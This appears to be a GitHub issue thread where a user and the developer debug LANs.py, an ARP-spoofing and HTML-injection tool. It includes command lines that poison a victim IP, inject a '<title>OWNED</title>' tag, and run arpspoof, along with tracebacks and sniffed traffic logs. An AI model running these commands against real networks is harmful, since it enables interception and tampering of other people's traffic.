Fixed, was missing a variable existence test. Surprised nobody else ever mentioned this one.

from lans.py.

After the fix, there is no error message, but nothing is happening either.
Like injection is not working at all:(

After few trials and deciding to exit (ctrl+c) I got:
[*] Flushed firewall and forwarded traffic to the queue; waiting for data

^Clearing iptables, sending healing packets, and turning off IP forwarding...

(which is obvious) but needed to wait for like 20-30 seconds to be dropped to shell.

And then….my router connection (from any device in the network) is dead.
When I run LANs.py again, I’ll get:

./LANs.py -u -d -p -ip 192.168.0.15

[] Checking the DHCP and DNS server addresses...
[] Active interface: wlan1
[] DHCP server: 192.168.0.1
[] DNS server:
[] Local domain: None
[] Router IP: 192.168.0.1
[] Victim IP: 192.168.0.15
[-] Router did not respond to ARP request for MAC, attempting to pull the MAC from the ARP cache
[] Router MAC: wlan1
[] Victim MAC:
[] Enabled IP forwarding
[*] Flushed firewall and forwarded traffic to the queue; waiting for data

Traceback (most recent call last):
File "./LANs.py", line 1119, in
main(parse_args())
File "./LANs.py", line 1115, in main
Spoof().poison(routerIP, victimIP, routerMAC, victimMAC)
File "./LANs.py", line 119, in poison
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC))
File "/usr/lib/python2.7/dist-packages/scapy/sendrecv.py", line 251, in send
*gen_send(conf.L3socket(_args, _kargs), x, inter=inter, loop=loop, count=count,verbose=verbose, realtime=realtime)
File "/usr/lib/python2.7/dist-packages/scapy/sendrecv.py", line 234, in __gen_send
s.send(p)
File "/usr/lib/python2.7/dist-packages/scapy/arch/linux.py", line 387, in send
sx = str(ll(x))
File "/usr/lib/python2.7/dist-packages/scapy/packet.py", line 261, in __str
return self.build()
File "/usr/lib/python2.7/dist-packages/scapy/packet.py", line 319, in build
p = self.do_build()
File "/usr/lib/python2.7/dist-packages/scapy/packet.py", line 311, in do_build
pay = self.do_build_payload()
File "/usr/lib/python2.7/dist-packages/scapy/packet.py", line 303, in do_build_payload
return self.payload.do_build()
File "/usr/lib/python2.7/dist-packages/scapy/packet.py", line 308, in do_build
pkt = self.self_build()
File "/usr/lib/python2.7/dist-packages/scapy/packet.py", line 299, in self_build
p = f.addfield(self, p, val)
File "/usr/lib/python2.7/dist-packages/scapy/fields.py", line 70, in addfield
return s+struct.pack(self.fmt, self.i2m(pkt,val))
File "/usr/lib/python2.7/dist-packages/scapy/fields.py", line 183, in i2m
return mac2str(x)
File "/usr/lib/python2.7/dist-packages/scapy/utils.py", line 244, in mac2str
return "".join(map(lambda x: chr(int(x,16)), mac.split(":")))
File "/usr/lib/python2.7/dist-packages/scapy/utils.py", line 244, in
return "".join(map(lambda x: chr(int(x,16)), mac.split(":")))
ValueError: invalid literal for int() with base 16: 'wlan1'

Every computer in the network has destroyed arp table from now:
CBP:~ mifau$ arp -an
? (192.168.0.1) at (incomplete) on en1 ifscope [ethernet]
? (192.168.0.11) at on en1 ifscope [ethernet]
? (192.168.0.17) at on en1 ifscope [ethernet]

So…thing got worse unfortunately:(
btw. I had to restart my wireless router in order to be able to use it again :) So…nice new feature;)) (DDoS)

from lans.py.

Not sure what the first problem you described was where it wouldn't show anything but the network problem was probably a problem with how it was reading your arp cache. I'm probably not parsing it accurately for when there's multiple entries. I made that a manual yes/no question now and if the router doesn't respond to the ARP packet asking what its MAC address is, well, not much within the scripts power to fix that. Also reinstated a more reliable code injection technique which has proved to be better than the recent change I made.

from lans.py.

./LANs.py -i wlan1 -c '<title>OWNED</title>' -ip 192.168.0.15
[] Checking the DHCP and DNS server addresses...
[] Active interface: wlan1
[] DHCP server: 192.168.0.1
[] DNS server:
[] Local domain: None
[] Router IP: 192.168.0.1
[] Victim IP: 192.168.0.15
[] Router MAC:
[] Victim MAC:
[] Enabled IP forwarding
[*] Flushed firewall and forwarded traffic to the queue; waiting for data

[+] Searched analytics.supplyframe.com: {term_enc}|contextualmatch=nolimitation|cookietax=0|ectime={ectime}|ecstatus={ecstatus}|manufacturer={manufacturer_enc}|part_number={part_number_enc}|cb=adaff6bb28|h_value=8ed76ae9aa262b6c1388847607|h_crc=4057766122|geo=pl|bp=0.3964400050932|bpf=0.058672434770854|cp=5
[+] Searched analytics.supplyframe.com: {term_enc}|contextualmatch=nolimitation|cookietax=0|ectime={ectime}|ecstatus={ecstatus}|manufacturer={manufacturer_enc}|part_number={part_number_enc}|cb=da070bd22e|h_value=3b42e9783d1725271388847607|h_crc=4057766122|geo=pl|bp=0.24158519025005|bpf=0.00078895482151116|cp=5
[+] Searched analytics.supplyframe.com: {term_enc}|contextualmatch=nolimitation|cookietax=0|ectime={ectime}|ecstatus={ecstatus}|manufacturer={manufacturer_enc}|part_number={part_number_enc}|cb=d25439bb28|h_value=66886edae145a0261388847607|h_crc=4057766122|geo=pl|bp=0.83614066339603|bpf=0.11406096361848|cp=5
[+] Searched analytics.supplyframe.com: {term_enc}|contextualmatch=nolimitation|cookietax=0|ectime={ectime}|ecstatus={ecstatus}|manufacturer={manufacturer_enc}|part_number={part_number_enc}|cb=b83a1301f4|h_value=f7588fbbcebe68b21388847607|h_crc=4057766122|geo=pl|bp=0.020458405252927|bpf=0.3107896090535|cp=5
[+] Searched 1.gravatar.com: 114

I was browsing http://hackaday.com with iPhone (iOS7).
Other pages which I was opening….didn't give me any messages.

And now….. when I hit CTRL+C !... No arp tables problems anymore in other computers…but my phone has not got internet access by that wifi anymore. So I assume that it's still not beeing cleaned properly.
I've fix that by running and quiting: arpspoof -i wlan1 -t 192.168.0.15 192.168.0.1. (So I'm probably right about that it's something with sending "healing" packets after CTRL+C).
I believe it may have something common with dns spoofing (in my case dns != router)...

I'm running LANs.py on Raspberry Pi (with quite hard modified PWNPi3.0 , with rtl8187 and rt5370 cards - wlan1 is rtl8187).
Ettercap didn't work for me (I mean filters which weren't changing incoming remote packages - as I understood It's common issue) so I've decided to check LANs.py. Sniffing is working great and I wanted to check html injection….as there is no other good alternative.
I can provide any information needed to verify what's wrong with my setup.
We can move private (if you don't want to make a mess here)...

from lans.py.

Sorry for spamming here, but….

[!] Injected HTML into packet for ….

:)
I just have reconfigured my wifi network to have same DNS IP == ROUTER IP.

And with such a settings "arp healing" is working ok also!

So there must be something connected with that (dns ip != router ip).

from lans.py.

Ah beautiful, looking into it.

from lans.py.

I think I got it, it was doing some bad logic when looking for the dnsMAC.

from lans.py.

For ROUTER != DNS:

./LANs.py -i wlan1 -c '<title>!!!!!!!</title>' -ip 192.168.0.15

I haven't got any injections:( (No messages, no action at all - but I can't check, at the moment, if victim was poisoned)

After CTRL+C and running it for a second time I got:

[] Checking the DHCP and DNS server addresses...
[] Active interface: wlan1
[] DHCP server: 192.168.0.1
[] DNS server: ……………...
[] Local domain: None
[] Router IP: 192.168.0.1
[] Victim IP: 192.168.0.15
[] Router MAC: …………………..
[] Victim MAC: …………………...
[] Enabled IP forwarding
[*] Flushed firewall and forwarded traffic to the queue; waiting for data

^Clearing iptables, sending healing packets, and turning off IP forwarding...
callback failure !
sys.excepthook is missing
lost sys.stderr
callback failure !
sys.excepthook is missing
lost sys.stderr
callback failure !
sys.excepthook is missing
lost sys.stderr
callback failure !
sys.excepthook is missing
lost sys.stderr
callback failure !
sys.excepthook is missing
lost sys.stderr
callback failure !
sys.excepthook is missing
lost sys.stderr
callback failure !
sys.excepthook is missing
lost sys.stderr

The good news is that after exit, every computer/smartphone in the network was working ok.

The thing could be (but I doubt as it was working before) that my dns!=router network is WPA2 network.
The opened network is working great (and CTRL+C is also working as it should….so don’t chane there anything!).

And Dan…. you’re incredible with all that quick changes! Tnx!
Keep on doing the great job, especially as there is no working alternative!

from lans.py.

I realized that since I recently redid the DNS spoofing to be 100% reliable, I also removed the one part of the code that actually depended on getting the DNS server's MAC address. I just pulled out the DNS MAC code entirely. That being said, I wasn't actually able to replicate the problem once I got on a network where I could adjust the DNS settings. I'm using NetworkManager on Kali.

from lans.py.

I"m trying to figure out what might be causing that callback failure... I'm thinking the only callbacks I'm using that could come that fast are process_pending(), Parser(args).start() (both of which are from nfqueue) and the reactor. Thinking this is probably twisted's reactor callback on Queued.doRead().

What version of nfqueue-bindings and python-twisted do you have?

from lans.py.

Taking the lack of response to imply resolution. Please don't hesitate to update this issue if you're still seeing problems and I will work on it.

from lans.py.